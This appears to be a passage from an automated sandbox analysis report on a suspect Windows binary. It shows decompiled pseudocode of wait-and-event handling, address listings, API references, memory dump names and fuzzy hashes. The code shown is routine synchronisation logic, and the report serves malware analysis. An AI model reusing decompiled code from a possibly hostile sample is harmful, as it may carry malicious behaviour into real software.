                                                                                                                                                                                                                                                                                                        								__eflags = _t86 - _t75;
                                                                                                                                                                                                                                                                                                        								_t86 =  >  ? _t75 : _t86;
                                                                                                                                                                                                                                                                                                        								_v72 = _t86;
                                                                                                                                                                                                                                                                                                        								 *_t90 = _t87;
                                                                                                                                                                                                                                                                                                        								_t61 = _v48();
                                                                                                                                                                                                                                                                                                        								_t90 = _t90 - 8;
                                                                                                                                                                                                                                                                                                        								__eflags = _t61 - 0x80;
                                                                                                                                                                                                                                                                                                        								if(_t61 == 0x80) {
                                                                                                                                                                                                                                                                                                        									_t79 = 1;
                                                                                                                                                                                                                                                                                                        									goto L30;
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									__eflags = _t61 - 0x102;
                                                                                                                                                                                                                                                                                                        									if(_t61 == 0x102) {
                                                                                                                                                                                                                                                                                                        										_t79 = 0x8a;
                                                                                                                                                                                                                                                                                                        										goto L30;
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										__eflags = _t61;
                                                                                                                                                                                                                                                                                                        										if(_t61 == 0) {
                                                                                                                                                                                                                                                                                                        											_t79 = 0;
                                                                                                                                                                                                                                                                                                        											__eflags = 0;
                                                                                                                                                                                                                                                                                                        											goto L40;
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        											_t79 = 0x16;
                                                                                                                                                                                                                                                                                                        											L30:
                                                                                                                                                                                                                                                                                                        											_t75 = _t75 - _t86;
                                                                                                                                                                                                                                                                                                        											__eflags = _t75;
                                                                                                                                                                                                                                                                                                        											if(_t75 != 0) {
                                                                                                                                                                                                                                                                                                        												_v52 = _t79;
                                                                                                                                                                                                                                                                                                        												_t62 = E00412070(_t75, _t79, _t82, _t86, _t87, _t88);
                                                                                                                                                                                                                                                                                                        												_t80 = _v52;
                                                                                                                                                                                                                                                                                                        												__eflags = _t62;
                                                                                                                                                                                                                                                                                                        												if(_t62 != 0) {
                                                                                                                                                                                                                                                                                                        													goto L17;
                                                                                                                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                                                                                                                        													goto L37;
                                                                                                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                                                                                                                        												L31:
                                                                                                                                                                                                                                                                                                        												__eflags = _t79 - 0x8a;
                                                                                                                                                                                                                                                                                                        												if(_t79 != 0x8a) {
                                                                                                                                                                                                                                                                                                        													L40:
                                                                                                                                                                                                                                                                                                        													__eflags = _t79;
                                                                                                                                                                                                                                                                                                        													if(_t79 != 0) {
                                                                                                                                                                                                                                                                                                        														goto L33;
                                                                                                                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                                                                                                                        														_t64 = _t79;
                                                                                                                                                                                                                                                                                                        														goto L35;
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                                                                                                                        													_v52 = _t79;
                                                                                                                                                                                                                                                                                                        													_v80 = 0;
                                                                                                                                                                                                                                                                                                        													 *_t90 = _t87;
                                                                                                                                                                                                                                                                                                        													_t65 = _v48();
                                                                                                                                                                                                                                                                                                        													_t79 = _v52;
                                                                                                                                                                                                                                                                                                        													__eflags = _t65;
                                                                                                                                                                                                                                                                                                        													if(_t65 == 0) {
                                                                                                                                                                                                                                                                                                        														goto L20;
                                                                                                                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                                                                                                                        														L33:
                                                                                                                                                                                                                                                                                                        														__eflags = _a8 - 2;
                                                                                                                                                                                                                                                                                                        														if(_a8 != 2) {
                                                                                                                                                                                                                                                                                                        															_v48 = _t79;
                                                                                                                                                                                                                                                                                                        															E00412210();
                                                                                                                                                                                                                                                                                                        															_t51 = _v48;
                                                                                                                                                                                                                                                                                                        															goto L15;
                                                                                                                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                                                                                                                        															_t64 = _t79;
                                                                                                                                                                                                                                                                                                        															L35:
                                                                                                                                                                                                                                                                                                        															return _t64;
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								goto L59;
                                                                                                                                                                                                                                                                                                        								L37:
                                                                                                                                                                                                                                                                                                        								__eflags = _t80 - 0x8a;
                                                                                                                                                                                                                                                                                                        							} while (_t80 == 0x8a);
                                                                                                                                                                                                                                                                                                        							goto L31;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                                                                                                                        							_v64 = _t75;
                                                                                                                                                                                                                                                                                                        							_v68 = 0;
                                                                                                                                                                                                                                                                                                        							_v72 =  &_v36;
                                                                                                                                                                                                                                                                                                        							 *_t90 = 2;
                                                                                                                                                                                                                                                                                                        							_t67 = WaitForMultipleObjects(??, ??, ??, ??);
                                                                                                                                                                                                                                                                                                        							_t99 = _t90 - 0x10;
                                                                                                                                                                                                                                                                                                        							_t103 = _t67 - 1;
                                                                                                                                                                                                                                                                                                        							if(_t103 != 0) {
                                                                                                                                                                                                                                                                                                        								break;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							 *_t99 = _v32;
                                                                                                                                                                                                                                                                                                        							ResetEvent(??);
                                                                                                                                                                                                                                                                                                        							_t90 = _t99 - 4;
                                                                                                                                                                                                                                                                                                        							__eflags = _a8 - 2;
                                                                                                                                                                                                                                                                                                        							if(_a8 != 2) {
                                                                                                                                                                                                                                                                                                        								L50:
                                                                                                                                                                                                                                                                                                        								E00412210();
                                                                                                                                                                                                                                                                                                        								_t51 = 0x16;
                                                                                                                                                                                                                                                                                                        								L15:
                                                                                                                                                                                                                                                                                                        								return _t51;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								E00412210();
                                                                                                                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							goto L59;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						if(_t103 < 0) {
                                                                                                                                                                                                                                                                                                        							_t48 = 0;
                                                                                                                                                                                                                                                                                                        							goto L11;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							if(_t67 == 0x80) {
                                                                                                                                                                                                                                                                                                        								_t76 = 1;
                                                                                                                                                                                                                                                                                                        								goto L7;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								if(_t67 != 0x102) {
                                                                                                                                                                                                                                                                                                        									__eflags = _a8 - 2;
                                                                                                                                                                                                                                                                                                        									_t76 = 0x16;
                                                                                                                                                                                                                                                                                                        									_t73 = _t67 & 0xffffff00 | _a8 != 0x00000002;
                                                                                                                                                                                                                                                                                                        									goto L9;
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									_t76 = 0x8a;
                                                                                                                                                                                                                                                                                                        									L7:
                                                                                                                                                                                                                                                                                                        									_v72 = 0;
                                                                                                                                                                                                                                                                                                        									 *_t99 = _v36;
                                                                                                                                                                                                                                                                                                        									_t72 = WaitForSingleObject(??, ??);
                                                                                                                                                                                                                                                                                                        									if(_t72 == 0) {
                                                                                                                                                                                                                                                                                                        										L20:
                                                                                                                                                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                                                                                                                                                        										return 0;
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										_t73 = _t72 & 0xffffff00 | _a8 != 0x00000002;
                                                                                                                                                                                                                                                                                                        										L9:
                                                                                                                                                                                                                                                                                                        										if(_t73 != 0) {
                                                                                                                                                                                                                                                                                                        											_t74 = E00412070(_t76, _t78, _t82, _t85, _t87, _t88);
                                                                                                                                                                                                                                                                                                        											_t51 = _t76;
                                                                                                                                                                                                                                                                                                        											__eflags = _t74;
                                                                                                                                                                                                                                                                                                        											if(_t74 == 0) {
                                                                                                                                                                                                                                                                                                        												goto L15;
                                                                                                                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                                                                                                                        												L17:
                                                                                                                                                                                                                                                                                                        												return 0x16;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        											L10:
                                                                                                                                                                                                                                                                                                        											_t48 = _t76;
                                                                                                                                                                                                                                                                                                        											L11:
                                                                                                                                                                                                                                                                                                        											return _t48;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				L59:
                                                                                                                                                                                                                                                                                                        			}
















































                                                                                                                                                                                                                                                                                                        0x00416290
                                                                                                                                                                                                                                                                                                        0x00416290
                                                                                                                                                                                                                                                                                                        0x00416296
                                                                                                                                                                                                                                                                                                        0x00416299
                                                                                                                                                                                                                                                                                                        0x0041629c
                                                                                                                                                                                                                                                                                                        0x004162a0
                                                                                                                                                                                                                                                                                                        0x004162a3
                                                                                                                                                                                                                                                                                                        0x0041634a
                                                                                                                                                                                                                                                                                                        0x0041634e
                                                                                                                                                                                                                                                                                                        0x00416351
                                                                                                                                                                                                                                                                                                        0x00416354
                                                                                                                                                                                                                                                                                                        0x00416356
                                                                                                                                                                                                                                                                                                        0x00416359
                                                                                                                                                                                                                                                                                                        0x0041635e
                                                                                                                                                                                                                                                                                                        0x004164e0
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416364
                                                                                                                                                                                                                                                                                                        0x00416364
                                                                                                                                                                                                                                                                                                        0x00416369
                                                                                                                                                                                                                                                                                                        0x004163a0
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041636b
                                                                                                                                                                                                                                                                                                        0x0041636b
                                                                                                                                                                                                                                                                                                        0x0041636e
                                                                                                                                                                                                                                                                                                        0x00416372
                                                                                                                                                                                                                                                                                                        0x00416372
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416372
                                                                                                                                                                                                                                                                                                        0x00416369
                                                                                                                                                                                                                                                                                                        0x004162a9
                                                                                                                                                                                                                                                                                                        0x004162a9
                                                                                                                                                                                                                                                                                                        0x004162b1
                                                                                                                                                                                                                                                                                                        0x004162b4
                                                                                                                                                                                                                                                                                                        0x004162bb
                                                                                                                                                                                                                                                                                                        0x004162be
                                                                                                                                                                                                                                                                                                        0x004163f0
                                                                                                                                                                                                                                                                                                        0x004163f3
                                                                                                                                                                                                                                                                                                        0x0041652c
                                                                                                                                                                                                                                                                                                        0x00416530
                                                                                                                                                                                                                                                                                                        0x00416530
                                                                                                                                                                                                                                                                                                        0x00416538
                                                                                                                                                                                                                                                                                                        0x0041653b
                                                                                                                                                                                                                                                                                                        0x0041653e
                                                                                                                                                                                                                                                                                                        0x00416541
                                                                                                                                                                                                                                                                                                        0x00416546
                                                                                                                                                                                                                                                                                                        0x00416548
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041654a
                                                                                                                                                                                                                                                                                                        0x0041654f
                                                                                                                                                                                                                                                                                                        0x00416505
                                                                                                                                                                                                                                                                                                        0x0041650a
                                                                                                                                                                                                                                                                                                        0x0041650c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416551
                                                                                                                                                                                                                                                                                                        0x00416551
                                                                                                                                                                                                                                                                                                        0x00416553
                                                                                                                                                                                                                                                                                                        0x00416555
                                                                                                                                                                                                                                                                                                        0x0041655a
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416560
                                                                                                                                                                                                                                                                                                        0x00416560
                                                                                                                                                                                                                                                                                                        0x00416560
                                                                                                                                                                                                                                                                                                        0x00416565
                                                                                                                                                                                                                                                                                                        0x00416567
                                                                                                                                                                                                                                                                                                        0x0041650e
                                                                                                                                                                                                                                                                                                        0x0041650e
                                                                                                                                                                                                                                                                                                        0x00416512
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416569
                                                                                                                                                                                                                                                                                                        0x00416569
                                                                                                                                                                                                                                                                                                        0x0041656c
                                                                                                                                                                                                                                                                                                        0x00416571
                                                                                                                                                                                                                                                                                                        0x004163a5
                                                                                                                                                                                                                                                                                                        0x004163a5
                                                                                                                                                                                                                                                                                                        0x004163ad
                                                                                                                                                                                                                                                                                                        0x004163b0
                                                                                                                                                                                                                                                                                                        0x004163b6
                                                                                                                                                                                                                                                                                                        0x004163b8
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416577
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416577
                                                                                                                                                                                                                                                                                                        0x00416571
                                                                                                                                                                                                                                                                                                        0x00416567
                                                                                                                                                                                                                                                                                                        0x0041655a
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041654f
                                                                                                                                                                                                                                                                                                        0x00416580
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004163f9
                                                                                                                                                                                                                                                                                                        0x004163fe
                                                                                                                                                                                                                                                                                                        0x00416403
                                                                                                                                                                                                                                                                                                        0x00416406
                                                                                                                                                                                                                                                                                                        0x00416406
                                                                                                                                                                                                                                                                                                        0x00416408
                                                                                                                                                                                                                                                                                                        0x0041640b
                                                                                                                                                                                                                                                                                                        0x0041640f
                                                                                                                                                                                                                                                                                                        0x00416412
                                                                                                                                                                                                                                                                                                        0x00416415
                                                                                                                                                                                                                                                                                                        0x00416418
                                                                                                                                                                                                                                                                                                        0x0041641d
                                                                                                                                                                                                                                                                                                        0x004164d0
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416423
                                                                                                                                                                                                                                                                                                        0x00416423
                                                                                                                                                                                                                                                                                                        0x00416428
                                                                                                                                                                                                                                                                                                        0x004164c0
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041642e
                                                                                                                                                                                                                                                                                                        0x0041642e
                                                                                                                                                                                                                                                                                                        0x00416430
                                                                                                                                                                                                                                                                                                        0x004164a0
                                                                                                                                                                                                                                                                                                        0x004164a0
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416432
                                                                                                                                                                                                                                                                                                        0x00416432
                                                                                                                                                                                                                                                                                                        0x00416437
                                                                                                                                                                                                                                                                                                        0x00416437
                                                                                                                                                                                                                                                                                                        0x00416437
                                                                                                                                                                                                                                                                                                        0x00416439
                                                                                                                                                                                                                                                                                                        0x00416478
                                                                                                                                                                                                                                                                                                        0x0041647b
                                                                                                                                                                                                                                                                                                        0x00416480
                                                                                                                                                                                                                                                                                                        0x00416483
                                                                                                                                                                                                                                                                                                        0x00416485
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041643b
                                                                                                                                                                                                                                                                                                        0x0041643b
                                                                                                                                                                                                                                                                                                        0x0041643b
                                                                                                                                                                                                                                                                                                        0x00416441
                                                                                                                                                                                                                                                                                                        0x004164a2
                                                                                                                                                                                                                                                                                                        0x004164a2
                                                                                                                                                                                                                                                                                                        0x004164a4
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004164a6
                                                                                                                                                                                                                                                                                                        0x004164a6
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004164a6
                                                                                                                                                                                                                                                                                                        0x00416443
                                                                                                                                                                                                                                                                                                        0x00416443
                                                                                                                                                                                                                                                                                                        0x00416446
                                                                                                                                                                                                                                                                                                        0x0041644e
                                                                                                                                                                                                                                                                                                        0x00416451
                                                                                                                                                                                                                                                                                                        0x00416454
                                                                                                                                                                                                                                                                                                        0x0041645a
                                                                                                                                                                                                                                                                                                        0x0041645c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416462
                                                                                                                                                                                                                                                                                                        0x00416462
                                                                                                                                                                                                                                                                                                        0x00416462
                                                                                                                                                                                                                                                                                                        0x00416466
                                                                                                                                                                                                                                                                                                        0x004164aa
                                                                                                                                                                                                                                                                                                        0x004164ad
                                                                                                                                                                                                                                                                                                        0x004164b5
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416468
                                                                                                                                                                                                                                                                                                        0x00416468
                                                                                                                                                                                                                                                                                                        0x00416470
                                                                                                                                                                                                                                                                                                        0x00416477
                                                                                                                                                                                                                                                                                                        0x00416477
                                                                                                                                                                                                                                                                                                        0x00416466
                                                                                                                                                                                                                                                                                                        0x0041645c
                                                                                                                                                                                                                                                                                                        0x00416441
                                                                                                                                                                                                                                                                                                        0x00416439
                                                                                                                                                                                                                                                                                                        0x00416430
                                                                                                                                                                                                                                                                                                        0x00416428
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041648b
                                                                                                                                                                                                                                                                                                        0x0041648b
                                                                                                                                                                                                                                                                                                        0x0041648b
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416497
                                                                                                                                                                                                                                                                                                        0x004162c4
                                                                                                                                                                                                                                                                                                        0x004162c4
                                                                                                                                                                                                                                                                                                        0x004162c7
                                                                                                                                                                                                                                                                                                        0x004162cb
                                                                                                                                                                                                                                                                                                        0x004162d3
                                                                                                                                                                                                                                                                                                        0x004162d7
                                                                                                                                                                                                                                                                                                        0x004162de
                                                                                                                                                                                                                                                                                                        0x004162e4
                                                                                                                                                                                                                                                                                                        0x004162e7
                                                                                                                                                                                                                                                                                                        0x004162ea
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004163d0
                                                                                                                                                                                                                                                                                                        0x004163d3
                                                                                                                                                                                                                                                                                                        0x004163d9
                                                                                                                                                                                                                                                                                                        0x004163dc
                                                                                                                                                                                                                                                                                                        0x004163e0
                                                                                                                                                                                                                                                                                                        0x00416518
                                                                                                                                                                                                                                                                                                        0x00416518
                                                                                                                                                                                                                                                                                                        0x0041651d
                                                                                                                                                                                                                                                                                                        0x00416375
                                                                                                                                                                                                                                                                                                        0x0041637c
                                                                                                                                                                                                                                                                                                        0x004163e6
                                                                                                                                                                                                                                                                                                        0x004163e6
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004163e6
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004163e0
                                                                                                                                                                                                                                                                                                        0x004162f0
                                                                                                                                                                                                                                                                                                        0x004163c6
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004162f6
                                                                                                                                                                                                                                                                                                        0x004162fb
                                                                                                                                                                                                                                                                                                        0x004164fb
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416301
                                                                                                                                                                                                                                                                                                        0x00416306
                                                                                                                                                                                                                                                                                                        0x004164ea
                                                                                                                                                                                                                                                                                                        0x004164ee
                                                                                                                                                                                                                                                                                                        0x004164f3
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041630c
                                                                                                                                                                                                                                                                                                        0x0041630c
                                                                                                                                                                                                                                                                                                        0x00416311
                                                                                                                                                                                                                                                                                                        0x00416314
                                                                                                                                                                                                                                                                                                        0x0041631c
                                                                                                                                                                                                                                                                                                        0x0041631f
                                                                                                                                                                                                                                                                                                        0x0041632a
                                                                                                                                                                                                                                                                                                        0x004163ba
                                                                                                                                                                                                                                                                                                        0x004163bd
                                                                                                                                                                                                                                                                                                        0x004163c3
                                                                                                                                                                                                                                                                                                        0x00416330
                                                                                                                                                                                                                                                                                                        0x00416334
                                                                                                                                                                                                                                                                                                        0x00416337
                                                                                                                                                                                                                                                                                                        0x00416339
                                                                                                                                                                                                                                                                                                        0x00416380
                                                                                                                                                                                                                                                                                                        0x00416387
                                                                                                                                                                                                                                                                                                        0x00416389
                                                                                                                                                                                                                                                                                                        0x0041638b
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041638d
                                                                                                                                                                                                                                                                                                        0x0041638d
                                                                                                                                                                                                                                                                                                        0x00416399
                                                                                                                                                                                                                                                                                                        0x00416399
                                                                                                                                                                                                                                                                                                        0x0041633b
                                                                                                                                                                                                                                                                                                        0x0041633b
                                                                                                                                                                                                                                                                                                        0x0041633b
                                                                                                                                                                                                                                                                                                        0x0041633d
                                                                                                                                                                                                                                                                                                        0x00416344
                                                                                                                                                                                                                                                                                                        0x00416344
                                                                                                                                                                                                                                                                                                        0x00416339
                                                                                                                                                                                                                                                                                                        0x0041632a
                                                                                                                                                                                                                                                                                                        0x00416306
                                                                                                                                                                                                                                                                                                        0x004162fb
                                                                                                                                                                                                                                                                                                        0x004162f0
                                                                                                                                                                                                                                                                                                        0x004162be
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • WaitForMultipleObjects.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00411205,FFFFFFFF,?,00413F5C), ref: 004162DE
                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00411205), ref: 0041631F
                                                                                                                                                                                                                                                                                                        • ResetEvent.KERNEL32 ref: 004163D3
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Wait$EventMultipleObjectObjectsResetSingle
                                                                                                                                                                                                                                                                                                        • String ID: (
                                                                                                                                                                                                                                                                                                        • API String ID: 256776027-3887548279
                                                                                                                                                                                                                                                                                                        • Opcode ID: b4733ac531acf217bfbfdf5bd4e52257d9b599610da1baf24221a20e7f36d5fc
                                                                                                                                                                                                                                                                                                        • Instruction ID: 33d5a718a10795f4640d15a2a31863235bdb1fdf0ba6d8b48b186967bb3fffd1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b4733ac531acf217bfbfdf5bd4e52257d9b599610da1baf24221a20e7f36d5fc
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A9618E71A042089BDF209FA9D5493EEB7A1EB44314F12853BEDA5D7380DB3DC885CB5A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Handle$Close$Information
                                                                                                                                                                                                                                                                                                        • String ID: h%
                                                                                                                                                                                                                                                                                                        • API String ID: 279656618-2361359942
                                                                                                                                                                                                                                                                                                        • Opcode ID: 5e26eb2f082092fd93500816398500556912164adaf229db355610f07e92ddda
                                                                                                                                                                                                                                                                                                        • Instruction ID: a911b25d2829e27f16f5e7be5a38597ebe99eb268f763eb2544e6e4d7d967738
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e26eb2f082092fd93500816398500556912164adaf229db355610f07e92ddda
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2414AB07043059BDB10EFA5D68439ABBF4AF04345F40887EE8859B345D778DA85CBAA
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: freememcpystrlen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2208669145-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: b95072503d289b122270171115fbda5e346781793e070ee70b941499e8d717ba
